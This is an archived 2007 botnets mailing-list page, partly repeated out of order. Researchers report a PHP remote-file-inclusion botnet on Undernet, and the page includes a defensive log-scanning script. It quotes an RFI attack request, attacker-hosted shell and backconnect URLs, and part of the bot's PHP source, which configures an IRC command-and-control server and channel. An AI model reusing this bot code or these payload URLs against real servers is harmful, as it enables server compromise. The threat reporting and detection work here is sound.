zombie-based botnet that spreads through various bugs in PHP. Undernet
admins please take a look at it. Description follows. Botnet herders are
Denzel, xeQt, aslpls-.


First attempt: 

85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET
/index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132
"-" "libwww-perl/5.79"

We mirror all links included, engine for RFI source is not com

Re: [botnets] Another botnet on eu.undernet.org

2007-03-21 Thread James Pleger
 {
    $key .= $pattern{rand(0,35)};
  }
  return $key;
}

// BYY xeQter vS TeaMrx - Br0nx

$ip = $_SERVER['REMOTE_ADDR'];
$HTTP_HOST = getenv("HTTP_HOST");
$REQUEST_URI = getenv("REQUEST_URI");
$xeQted = "[x] $HTTP_HOST$REQUEST_URI";
if (@file_exists("/bin/sh")) $pro1="sh$: Yes"; else $pro1="sh$: NO";
if (@file_exists("/usr/bin/wget")) $pro2="WGET: yes"; else $pro2="WGET:
NO";
if (@file_exists("/usr/bin/curl")) $pro3="CURL: yes"; else $pro3="CURL:
NO";
if (@file_exists("/usr/bin/lynx")) $pro4="LYNX: yes" ; else
$pro4="LYNX: NO";
if (@file_exists("/usr/bin/GET")) $pro5="GET: yes"; else $pro5="GET:
No";
if ($safe) $xsafe="Safe_mode: ON"; if (!$safe) $xsafe="safe_mode: OFF";
else $xsafe="Safe_mode: Unknown";
[EMAIL PROTECTED](); [EMAIL PROTECTED](); [EMAIL PROTECTED]();
$phpver = "PHP ".phpversion();

$vhost = "e8ea21c62fc9b75647054059b815d350";
$vhost2 = "7886906c819599697c97aa15d8e37f62";
$vhost3 = 'xeQt.users.undernet.org';
$identd = randomkeys(4).rand(100,999);
$me = randomkeys(5).rand(100,999);
$ircname = randomkeys(4).rand(100,999);
$version = "TeaMrx v1.0";
$server = "eu.undernet.org";
$quitmsg = "xeQt vS TeaMrx";
$chan = "#vx8";
$port = '6667';
while(0==0)
{
$ircsock = @fsockopen($server, $port);
James Pleger
Go Daddy Software, Inc.
[EMAIL PROTECTED]
Desk: 480-505-8800 x4093
Cell: 480-262-7293



David Vorel wrote:


Hi all,

nice shot Bodik ;] I found a different botnet on eu.undernet.org chan #vx8; it's a Linux
zombie-based botnet that spreads through various bugs in PHP. Undernet
admins please take a look at it. Description follows. Botnet herders are
Denzel, xeQt, aslpls-.


First attempt: 

85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET
/index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132
"-" "libwww-perl/5.79"

We mirror all links included; the engine for RFI source is not completed
yet, so for this time I send raw URLs.

http://nawader.org/modules/Top/kgb.c
http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt 
- PHP shell which includes other links

http://nawader.org/modules/Top/bc.txt
http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt
- Backconnect shell

http://nawader.org/modules/Top/n.txt
http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt
- Shellbot I, connect to eu.undernet.org #vx8

http://nawader.org/modules/Top/teamrx
http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt
- Loader for n.txt and bc.txt run backconnect and send shell to
  220.232.137.199 and 64.38.11.130


http://nawader.org/modules/Top/toyo.txt
http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt
- Shellbot II, connect to eu.undernet.org #vx8



All scripts are labelled "xeQt vS TeaMrx".

Who on chan:

http://www.honeynet.cz/trash/list

After a while on the channel the bot herders move bots to another chan.

#vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
#vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi.



Here is list from uname -sr.

http://www.honeynet.cz/trash/uname




chat:

:[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould u
:[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal
:[EMAIL PROTECTED] PRIVMSG #vx8 :make shit
<< PRIVMSG #vx8 :i now that you are criminal
<< PRIVMSG #vx8 :but still on free ?
:[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free
:[EMAIL PROTECTED] PRIVMSG #vx8 :$$
<< PRIVMSG xeQt :^AVERSION^A
:[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC v6.17 Khaled Mardam-Bey^A
:[EMAIL PROTECTED] PRIVMSG #vx8 :its my life
<< PRIVMSG #vx8 :jail is for free
:[EMAIL PROTECTED] PRIVMSG #vx8 :i know
:[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon
<< PRIVMSG #vx8 :y are waiting for ?
:[EMAIL PROTECTED] PRIVMSG #vx8 :its full
:[EMAIL PROTECTED] PRIVMSG #vx8 :a few months
:[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i goto wait
:[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one
:[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch any of the servers
<< PRIVMSG #vx8 :when u installed your script throught bug in php that's touching too
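A defender-side check for the kind of request that planted these bots, written as an added example (not code from the list, honeynet.cz or the bot authors): it parses Apache combined-format log lines, flags any query value that is an absolute URL, and notes the trailing '?' and non-.php extension tricks visible in the kgb.c request. The first sample line is the "first attempt" line David Vorel posted; the other lines, example.invalid and the 192.0.2.x/198.51.100.x addresses are constructed.

```python
"""Flag remote-file-inclusion (RFI) attempts in Apache combined-format access logs.
Added example, not code from the list or honeynet.cz; the first sample line is
the one David Vorel posted, the rest are constructed (example.invalid, 192.0.2.x
and 198.51.100.x are documentation addresses)."""
import re
from urllib.parse import urlsplit, parse_qsl

# Enough of the combined format to recover client IP, target, status and User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
SCRIPT_UAS = ("libwww-perl", "curl", "wget", "python")  # hint only, UAs are trivially spoofed
NON_PHP_EXTS = ("c", "txt", "gif", "jpg")  # kgb.c, n.txt, bc.txt: PHP hidden under other names


def remote_params(target):
    """(name, url) for every query value that is an absolute URL.
    parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = value.strip()
        if value.lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


def classify(line):
    """Alert dicts for one log line; empty list if it parses clean or not at all."""
    m = LOG_RE.match(line)
    if not m:
        return []
    alerts = []
    for name, url in remote_params(m.group("target")):
        flags = []
        if url.endswith("?"):
            # A trailing '?' turns whatever the vulnerable script appends
            # (".php", "/config.inc") into a query string, so the remote file loads as-is.
            flags.append("suffix-neutralising '?'")
        ext = urlsplit(url.rstrip("?")).path.rsplit(".", 1)[-1].lower()
        if ext in NON_PHP_EXTS:
            flags.append("non-PHP extension on included file")
        if m.group("ua").lower().startswith(SCRIPT_UAS):
            flags.append("scripted client")
        if m.group("status") == "200":
            flags.append("HTTP 200: include may have executed, triage first")
        alerts.append({"ip": m.group("ip"), "param": name, "url": url, "flags": flags})
    return alerts


def scan(lines):
    """All alerts over an iterable of log lines, in input order."""
    return [a for line in lines for a in classify(line)]


SAMPLE_LOG = [
    # from the page: David Vorel's "first attempt" line
    '85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132 "-" "libwww-perl/5.79"',
    # constructed: ordinary request, same parameter, local value
    '192.0.2.10 - - [20/Mar/2007:04:11:02 +0100] "GET /index.php?loc=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    # constructed: percent-encoded URL in another parameter, rejected with 403
    '198.51.100.7 - - [20/Mar/2007:04:12:15 +0100] "GET /page.php?inc=http%3A%2F%2Fexample.invalid%2Fshell.txt HTTP/1.0" 403 0 "-" "curl/7.15"',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a["ip"], a["param"], a["url"], "|", "; ".join(a["flags"]))
```

Any parameter that takes a URL by design (an open redirector, say) will also be flagged; that is intended, since those are the same endpoints worth reviewing.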
  
  

   

Re: [botnets] defacements for the installation of malcode (Gadi Evron)

2007-02-21 Thread James Pleger



What I have seen is that a good majority of the C&C's are running
on dedicated hosts that might have been set up fraudulently, or that
have been compromised. As far as the clients of these C&C's, it
really depends on what the attacker is targeting... If he is targeting
the new Windows vulnerability, then there will be lots of end users
that are on the botnet, which are directly connected to the Internet.

Some of the bots that come from major businesses appear to be from
accidental downloads of malware.

Running a C&C on a major business's network is more hassle than it
is worth for the attacker, as you would have to compromise the host,
deal with firewalls, and the C&C would be shut down fairly
quickly (hours, instead of days or weeks).

Just my 2 cents.

Adriel T. Desuatels wrote:

List, 
I have a team that has been performing research against information
collected from shadowserver. So far I'm seeing that bots are not
compromising major businesses, but do have a significant indirect negative
impact on those businesses.

Has anyone seen bots coming from IP addresses registered to major
businesses? Has anyone seen C&C servers installed on networks run by major
businesses? Or, are these compromises mostly smaller businesses and home
users?




On 2/16/07 6:43 PM, "Tom" <[EMAIL PROTECTED]> wrote:

  
  


  On Wed, 14 Feb 2007, Jeremy Epstein wrote:
  
  
 There was also a really entertaining presentation from Patrick Petersen of
 IronPort at RSA, in which he mentioned use of defaced web sites as proxy
 forwarders for spammers.  According to the presentation, the spammers have a
 fairly sophisticated toolkit that takes over the site and turns it into a
 pharmacy (or whatever) redirect site.  A different goal from the Websense
 presentation, but still a purpose other than simple defacement.

  
  Indeed. I can post some screenshots of some of these tools if you are
interested in them.

Anon remailers, spam tools, etc. More and more spam is being sent using
web servers.

I am looking for someone to volunteer to create SpamAssassin rules based
on how these tools send mail.
  

Rules are easy when either you don't have it installed or you are
proactive and installed it in a non default location which is what we
do.

I have a couple of rules based upon log analysis and can probably
generate more but can't you just use:
http://bleedingthreats.net/bleeding-web.rules
http://bleedingthreats.net/bleeding-exploit.rules
http://bleedingthreats.net/bleeding-attack_response.rules

Tom

  
  
  





Re: [botnets] Web Server Botnets and Server Farms as Attack Platforms

2007-02-17 Thread James Pleger
I saw it come in like 5 times at 10:58 am, and 2 times at 9:20am on 2/16.

John G. wrote:
> is it just me, or has Tom's reply come through three or more times so far?
>
> From: Tom <[EMAIL PROTECTED]>
> Subject: Re: [botnets] Web Server Botnets and Server Farms as Attack
>   Platforms
>
>
> John G.
>
> I GoodSearch for Warren J. Plaut Charitable Trust
> Raise money for your favorite charity or school just by searching the 
> Internet with GoodSearch - www.goodsearch.com - powered by Yahoo!
>